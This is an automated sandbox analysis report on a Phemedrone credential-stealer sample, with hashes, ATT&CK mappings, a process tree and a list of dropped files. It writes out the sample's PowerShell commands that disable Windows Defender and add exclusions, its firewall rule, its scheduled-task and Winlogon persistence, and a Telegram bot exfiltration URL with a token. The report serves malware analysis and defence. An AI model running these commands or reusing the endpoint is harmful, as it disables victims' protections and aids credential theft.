phemedrone | c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2

Analysis

max time kernel
120s
max time network
125s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
19-09-2024 08:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe
Size

768KB
MD5

69c4993d6b9836514cacc5997e171af0
SHA1

1140c1da02be1aee978bb942e2458b625c666884
SHA256

c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2
SHA512

bbab4efad27846b3032c22fca816cf8792ab9d8944aa38185a6a867ecbbefa39b0b10cab6e357f512413fb7bd7352d5a18a19f68eb946e039c3eda9db7721419
SSDEEP

12288:/EkHbPv8rE9hHKCzt8wDvsgCB9HM1tUUEAWss9apo0:/lHUE98ct8iv2s0lHNe

Score

10^/10

phemedrone credential_access evasion execution persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Family

phemedrone

https://api.telegram.org/bot7266067820:AAGt1Lxc4KCTQDsEE5jnHkzETADxNAfSwWU/sendDocument

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\wd.vbs	disable_win_def

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

dll.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\WindowsHealth.exe"	dll.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

WScript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	WScript.exe

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1968	powershell.exe
4316	powershell.exe
1132	powershell.exe
3344	powershell.exe
2248	powershell.exe
3756	powershell.exe
5112	powershell.exe
5516	powershell.exe
536	powershell.exe
1548	powershell.exe
1608	powershell.exe
5728	powershell.exe
4956	powershell.exe
5436	powershell.exe

Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
persistence privilege_escalation

AppInit DLLs
T1546.010

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exeWScript.exeWScript.exedll.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	dll.exe

Executes dropped EXE 3 IoCs

Processes:

dll.exephem.exeWindowsHealth.exe

pid process

4112 dll.exe
3708 phem.exe
2688 WindowsHealth.exe
Loads dropped DLL 5 IoCs

Processes:

WindowsHealth.exe

pid process

2688 WindowsHealth.exe
3960
6124
4592
1544
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

pid	process
4112	dll.exe
3708	phem.exe
2688	WindowsHealth.exe

pid	process
2688	WindowsHealth.exe
3960
6124
4592
1544

Drops file in Windows directory 5 IoCs

Processes:

dll.exeWindowsHealth.exe

description	ioc	process
File created	C:\Windows\xdwd.dll	dll.exe
File opened for modification	C:\Windows\xdwd.dll	dll.exe
File opened for modification	C:\Windows\Setup.exe	WindowsHealth.exe
File created	C:\Windows\Setup.exe	dll.exe
File opened for modification	C:\Windows\Setup.exe	dll.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 2 IoCs

Processes:

c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exedll.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	dll.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

2104 schtasks.exe
3472 schtasks.exe

pid	process
2104	schtasks.exe
3472	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exephem.exe

pid	process
5728	powershell.exe
5728	powershell.exe
4956	powershell.exe
4956	powershell.exe
5436	powershell.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
5436	powershell.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe
3708	phem.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exedll.exepowershell.exephem.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWindowsHealth.exe

description	pid	process
Token: SeDebugPrivilege	5728	powershell.exe
Token: SeDebugPrivilege	4956	powershell.exe
Token: SeDebugPrivilege	4112	dll.exe
Token: SeDebugPrivilege	5436	powershell.exe
Token: SeDebugPrivilege	3708	phem.exe
Token: SeDebugPrivilege	1548	powershell.exe
Token: SeDebugPrivilege	3756	powershell.exe
Token: SeDebugPrivilege	5516	powershell.exe
Token: SeDebugPrivilege	5112	powershell.exe
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	3344	powershell.exe
Token: SeDebugPrivilege	2248	powershell.exe
Token: SeDebugPrivilege	1132	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	536	powershell.exe
Token: SeDebugPrivilege	2688	WindowsHealth.exe
Token: SeIncBasePriorityPrivilege	2688	WindowsHealth.exe

Suspicious use of WriteProcessMemory 48 IoCs

Processes:

c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exeWScript.exeWScript.exedll.execmd.execmd.exe

description	pid	process	target process
PID 1700 wrote to memory of 5728	1700	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	powershell.exe
PID 1700 wrote to memory of 5728	1700	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	powershell.exe
PID 1700 wrote to memory of 4112	1700	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	dll.exe
PID 1700 wrote to memory of 4112	1700	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	dll.exe
PID 1700 wrote to memory of 4956	1700	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	powershell.exe
PID 1700 wrote to memory of 4956	1700	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	powershell.exe
PID 1700 wrote to memory of 3708	1700	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	phem.exe
PID 1700 wrote to memory of 3708	1700	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	phem.exe
PID 1700 wrote to memory of 5436	1700	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	powershell.exe
PID 1700 wrote to memory of 5436	1700	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	powershell.exe
PID 1700 wrote to memory of 1720	1700	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	WScript.exe
PID 1700 wrote to memory of 1720	1700	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	WScript.exe
PID 1720 wrote to memory of 4632	1720	WScript.exe	WScript.exe
PID 1720 wrote to memory of 4632	1720	WScript.exe	WScript.exe
PID 4632 wrote to memory of 3756	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 3756	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 1548	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 1548	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 5112	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 5112	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 5516	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 5516	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 1968	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 1968	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 4316	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 4316	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 1132	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 1132	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 3344	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 3344	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 2248	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 2248	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 536	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 536	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 1608	4632	WScript.exe	powershell.exe
PID 4632 wrote to memory of 1608	4632	WScript.exe	powershell.exe
PID 4112 wrote to memory of 2060	4112	dll.exe	CMD.exe
PID 4112 wrote to memory of 2060	4112	dll.exe	CMD.exe
PID 4112 wrote to memory of 3404	4112	dll.exe	cmd.exe
PID 4112 wrote to memory of 3404	4112	dll.exe	cmd.exe
PID 4112 wrote to memory of 2768	4112	dll.exe	cmd.exe
PID 4112 wrote to memory of 2768	4112	dll.exe	cmd.exe
PID 3404 wrote to memory of 2104	3404	cmd.exe	schtasks.exe
PID 3404 wrote to memory of 2104	3404	cmd.exe	schtasks.exe
PID 2768 wrote to memory of 3472	2768	cmd.exe	schtasks.exe
PID 2768 wrote to memory of 3472	2768	cmd.exe	schtasks.exe
PID 4112 wrote to memory of 2688	4112	dll.exe	WindowsHealth.exe
PID 4112 wrote to memory of 2688	4112	dll.exe	WindowsHealth.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe
"C:\Users\Admin\AppData\Local\Temp\c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dll.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5728
- C:\Users\Admin\AppData\Local\Temp\dll.exe
  "C:\Users\Admin\AppData\Local\Temp\dll.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4112
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" netsh advfirewall firewall add rule name="I6KX"gGn"Kc.">" dir=in action=allow program="C:\Users\Admin\WindowsHealth.exe" enable=yes & exit
    3⤵
    PID:2060
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Setup.exe" /tr "C:\Users\Admin\WindowsHealth.exe" /RL HIGHEST & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3404
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc minute /mo 1 /tn "Setup.exe" /tr "C:\Users\Admin\WindowsHealth.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2104
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Setup.exe" /tr "C:\Windows\Setup.exe" /RL HIGHEST & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2768
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc minute /mo 30 /tn "Setup.exe" /tr "C:\Windows\Setup.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3472
- - C:\Users\Admin\WindowsHealth.exe
    "C:\Users\Admin\WindowsHealth.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    PID:2688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\phem.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4956
- C:\Users\Admin\AppData\Local\Temp\phem.exe
  "C:\Users\Admin\AppData\Local\Temp\phem.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\wd.vbs'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5436
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wd.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:1720
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wd.vbs" /elevate
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4632
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:3756
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:5112
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:5516
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:3344
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2248
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:536
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4384,i,2904906934812054273,11716976550456127484,262144 --variations-seed-version --mojo-platform-channel-handle=3820 /prefetch:8
1⤵
PID:5956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
145039ee65251da29aa337556cab6c61

SHA1
5dce5405ea3ab3c00a5ff7044c8bb7b684f9973e

SHA256
26bbedffe13d17dc90fda8ee3423a05695ef2d9d10cad9f537334074ec105788

SHA512
d6536c7c31ce564a80c45d4acff414c5426a777ec5bbd8a9f3eb19f6a82ca25dda557f15a600df81b5b2472881d6b266cd1be93dfedcf44a244ce47904e3c46e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
0e046a2ca47c01116ab2c42b4553232c

SHA1
750650547f305d5cd7f832341f6a17618aa98800

SHA256
d063753bbc9924e4bf9306167893909c3898072109e13b479ccdac493a8f3a2d

SHA512
dc1c95dbb27fb1fcc577a841abad5a2ca16445b1c51640853f497df8fca260ae5d5fee2d402b18c61a263a6af5a5b71661fb880234bd8de3e6636887f03ae0df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
057e7742b25e65a341d1341da25b54a8

SHA1
65c874ac4f429a4172bdf89a73922e39873ecab6

SHA256
f8cf996545599e442f94820af5c724fca27d22de96bcef6aa308d0520c3a1468

SHA512
94b461e3705336b9ebf10df506f4a436cee20ac60540cfb6fd2f36c48e011836bf1f9e3f00e5b254ad6e6f1338a976dba495d398b4459687f518e815afde04e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
7d938922c60b82c232e1dc1d2cb172d6

SHA1
8c5546fbca478815e77f5dff30fe00e5e5fd6a9a

SHA256
463e9ebf5171ef9ead61019e5fa863ecd958d4390e88079394a98c050ad32a1f

SHA512
479ac4d43bcaea8059ff4ae9023e35f81e2d04eba16b3bec76c1b198891b2b8ea27a03e3862ca73dbe2e98dae5538b007df8418f10c2e3f52c93bcbbae10f105

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
627deabb4703797ece516ffff56dff63

SHA1
a73aad49150b7daf33c81fdb3d03104dcf98e10e

SHA256
fa203b9c836b5783d582900b5a1e65dc21fbf2ff25af63c41f9272ea930d8473

SHA512
0b44ed0301024c9b19fc0b5c73048b37142121628be818888970c9c3f3a71a75731e27791302e42347d9630c4ba446d02b07af723570f9813f86736b3c2582c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
34f595487e6bfd1d11c7de88ee50356a

SHA1
4caad088c15766cc0fa1f42009260e9a02f953bb

SHA256
0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

SHA512
10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ba169f4dcbbf147fe78ef0061a95e83b

SHA1
92a571a6eef49fff666e0f62a3545bcd1cdcda67

SHA256
5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

SHA512
8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s5mhfz5p.qfw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll.exe

Filesize
494KB

MD5
8df36558e2243aebb32c2f000f6c3004

SHA1
cdadf26e175a7c5c2f0733e922b20a3ed9e40b7c

SHA256
6416b46a1ef1c7f430578d925ba79755c44587de14fe25f13e3d907c2adab47e

SHA512
cd458956d0a2d7e84682735f815ec9ee3522b23d959870b9b12f7b780fac5a881c350b1ec7e0edd14b0b89219877c5eda7bdd5e75c613478cad3ccf3a85fb42b

Download Submit
C:\Users\Admin\AppData\Local\Temp\phem.exe

Filesize
121KB

MD5
da35d4754d59730768427d275dadfa76

SHA1
2cc27a5fa85d0c5a8faa9874d6cb45b472dd1ac8

SHA256
cbf36379349e8bfe52ce74ee151322333161142acb9f7b9434e2acaa6217755f

SHA512
c031ffdaa7624b71039810cca9cc045ddd84e570bb44ad211d6f9b5cc12676b74ce515c326cdf1323ed586e60cdb29806d603b9c9d503f31130c84551285ed0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\wd.vbs

Filesize
1KB

MD5
f95be7e4eb1d1c7114c8daccb3ad6c63

SHA1
e0605fc6729fdfce938f5dfc07e2bcf11df22301

SHA256
86b3c33e6b71fe3907bc8c21b8ce311ff375d215d0a4924eba3c5f32068fe6e1

SHA512
58998140cdeb52047f2dc762598a0c13535bdfa81145ac4e394d6f7bf3ff7e0766eb375da140a8d3a784c6460b4cdd22d09bcb135ea8fa4d06733700783acc84

Download Submit
C:\Windows\xdwd.dll

Filesize
136KB

MD5
16e5a492c9c6ae34c59683be9c51fa31

SHA1
97031b41f5c56f371c28ae0d62a2df7d585adaba

SHA256
35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66

SHA512
20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

Download Submit
memory/1700-75-0x00007FF9CDE80000-0x00007FF9CE941000-memory.dmp

Filesize
10.8MB

Download
memory/1700-1-0x0000000000F30000-0x0000000000FF4000-memory.dmp

Filesize
784KB

Download
memory/1700-20-0x00007FF9CDE80000-0x00007FF9CE941000-memory.dmp

Filesize
10.8MB

Download
memory/1700-0-0x00007FF9CDE83000-0x00007FF9CDE85000-memory.dmp

Filesize
8KB

Download
